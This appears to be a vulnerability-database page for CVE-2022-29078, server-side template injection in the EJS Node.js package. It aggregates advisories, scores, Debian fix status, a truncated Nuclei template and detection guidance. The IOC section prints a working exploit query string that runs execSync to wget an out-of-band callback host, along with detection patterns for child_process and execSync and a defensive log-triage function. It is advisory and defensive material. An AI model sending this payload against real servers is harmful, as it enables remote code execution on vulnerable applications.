CVE-2022-29078
Published 2022-04-25
Priority: P185 · Severity: critical · CVSS 3.1: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 32.39% (98.1th percentile)
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | node-ejs | < node-ejs 3.1.7-1 (bookworm) | node-ejs 3.1.7-1 (bookworm) |
| ejs | ejs | — | — |
| ejs | ejs | >= 0 < 3.1.7 | 3.1.7 |
Detection & IOCs
url: GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1
command: settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('wget+http://{{interactsh-url}}');s
path: /page?id=<randstr>&settings[view options][outputFunctionName]=<payload>
- Detect SSTI exploitation attempts targeting the EJS outputFunctionName parameter via HTTP query string. Look for the pattern 'settings[view' or 'outputFunctionName' in URL query parameters, especially combined with Node.js process/child_process invocations.
- Monitor HTTP requests containing URL-encoded child_process or execSync strings in query parameters, which indicate active exploitation of CVE-2022-29078 RCE payload delivery.
- Alert on HTTP responses containing 'You are viewing page number' as a confirmation of successful EJS template rendering, which can be used to confirm a vulnerable EJS endpoint.
- Out-of-band (OOB) HTTP callback detection: exploitation payloads use wget or similar tools to beacon to an external URL. Monitor for unexpected outbound HTTP requests from Node.js/EJS application processes.
- The vulnerability is specific to EJS version 3.1.6 for Node.js. Versions 3.1.7 and above (and Debian-patched 2.5.7-3+deb11u1) are not affected. Ensure version fingerprinting is part of detection triage.
- The attack vector requires the application to pass user-controlled input into EJS render settings (specifically the 'view options' namespace). Applications that do not expose this parameter path are not exploitable even on vulnerable EJS versions.
- Several Red Hat packages are listed as 'Not affected' or 'Will not fix', meaning presence of EJS 3.1.6 in a container image does not automatically imply exploitability; context of how EJS is invoked matters.
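The query-string checks in the detection notes above, written as a Node.js log-triage function. This is an added example, not code from this page or from the ejs project; it normalises URL encoding and flags keys of the form settings[view options][…]. The function names, verdict labels and sample request targets are constructed for illustration.

```javascript
// Added example (not from the original page): triage request targets for
// attempts to set EJS internal options through the query string.

// Query key that maps onto EJS options when req.query reaches res.render().
const OPTION_KEY = /^settings\[view options\]\[([^\]]+)\]$/;
// Strings the detection notes associate with code execution in the value.
const EXEC_HINT = /child_process|execSync|process\.mainModule/i;

// Decode a bounded number of times so encoded and double-encoded
// brackets and spaces (%5B, %255B, +) normalise to the same key.
function fullyDecode(s, maxRounds = 3) {
  let cur = s.replace(/\+/g, ' ');
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch { break; } // malformed %
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

function classifyRequestTarget(target) {
  const findings = [];
  const q = target.indexOf('?');
  const pairs = q === -1 ? [] : target.slice(q + 1).split('&');
  for (const pair of pairs) {
    const eq = pair.indexOf('=');
    const key = fullyDecode(eq === -1 ? pair : pair.slice(0, eq));
    const value = fullyDecode(eq === -1 ? '' : pair.slice(eq + 1));
    const m = OPTION_KEY.exec(key);
    if (m) findings.push({ option: m[1], execHint: EXEC_HINT.test(value) });
  }
  if (findings.length === 0) return { verdict: 'clean', findings };
  const inject = findings.some(
    (f) => f.option === 'outputFunctionName' && f.execHint);
  return { verdict: inject ? 'code-injection-attempt' : 'option-override', findings };
}

// Constructed sample targets; the second carries a non-functional placeholder value.
const SAMPLE_TARGETS = [
  '/page?id=42',
  '/page?id=42&settings[view%20options][outputFunctionName]=x;PLACEHOLDER-child_process-execSync;s',
  '/page?id=42&settings%255Bview%2520options%255D%255BoutputFunctionName%255D=abc',
  '/page?id=42&settings[view+options][delimiter]=%25',
  '/search?q=outputFunctionName+docs',
];
for (const t of SAMPLE_TARGETS) console.log(classifyRequestTarget(t).verdict, t);
```

Matching on the decoded key rather than on a bare substring keeps the last sample, a search for the word outputFunctionName, from raising an alert.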
CVSS provenance
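| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | | 9.8 | CRITICAL | |
| vulncheck | | 9.8 | CRITICAL | |
| vendor_debian | | 9.8 | CRITICAL | |
| vendor_redhat | | 9.8 | CRITICAL | |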
GHSA
ejs template injection vulnerability
ghsa·2022-04-26
CVE-2022-29078 [CRITICAL] CWE-74 ejs template injection vulnerability
OSV
ejs template injection vulnerability
osv·2022-04-26
CVE-2022-29078 [CRITICAL] ejs template injection vulnerability
OSV
CVE-2022-29078: The ejs (aka Embedded JavaScript templates) package 3
osv·2022-04-25·CVSS 9.8
CVE-2022-29078 [CRITICAL] CVE-2022-29078: The ejs (aka Embedded JavaScript templates) package 3
VulnCheck
ejs ejs Improper Control of Generation of Code ('Code Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-29078 [CRITICAL] ejs ejs Improper Control of Generation of Code ('Code Injection')
Affected: ejs ejs
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-09-18&host_type=src&vulnerability=cve-2022-29078; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-0
Red Hat
ejs: server-side template injection in outputFunctionName
vendor_redhat·2022-04-25·CVSS 9.8
CVE-2022-29078 [CRITICAL] CWE-74 ejs: server-side template injection in outputFunctionName
A Command injection attack was found in ejs (Embedded JavaScript templates) for Node.js, which allows an attacker to execute server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command executed upon template compilation.
Package: rhmtc/openshift-migration-ui-rhel8 (Migration Toolkit for Containe
Debian
CVE-2022-29078: node-ejs - The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows ser...
vendor_debian·2022·CVSS 9.8
CVE-2022-29078 [CRITICAL] CVE-2022-29078: node-ejs - The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows ser...
Scope: local
bookworm: resolved (fixed in 3.1.7-1)
bullseye: resolved (fixed in 2.5.7-3+deb11u1)
forky: resolved (fixed in 3.1.7-1)
sid: resolved (fixed in 3.1.7-1)
trixie: resolved (fixed in 3.1.7-1)
No detection rules found.
Nuclei
Node.js Embedded JavaScript 3.1.6 - Template Injection
nuclei·CVSS 9.8
CVE-2022-29078 [CRITICAL] Node.js Embedded JavaScript 3.1.6 - Template Injection
Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.
Template:
```yaml
id: CVE-2022-29078

info:
  name: Node.js Embedded JavaScript 3.1.6 - Template Injection
  author: For3stCo1d
  severity: critical
  description: |
    Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.
  impa
```
Greynoiseio
NoiseLetter September 2025
blogs_greynoiseio
arXiv
ZeroDayBench: Evaluating LLM Agents on Unseen Zero-Day Vulnerabilities for Cyberdefense
arxiv_fulltext·2026-03-02
## Abstract
Large language models (LLMs) are increasingly being deployed as software engineering agents that autonomously contribute to repositories. A major benefit these agents present is their ability to find and patch security vulnerabilities in the codebases they oversee. To estimate the capability of agents in this domain, we introduce ZeroDayBench, a benchmark where LLM agents find and patch 22 novel critical vulnerabilities in open-source codebases. We focus our efforts on three popular frontier agentic LLMs: GPT-5.2, Claude Sonnet 4.5, and Grok 4.1. We find that frontier LLMs are not yet capable of autonomously solving our tasks and observe some behavioral patterns that suggest how these models can be improved in the domain of proactive cyberdefense.
## Introduction
Large langu
- https://eslam.io/posts/ejs-server-side-template-injection-rce/
- https://github.com/mde/ejs/releases
- https://security.netapp.com/advisory/ntap-20220804-0001/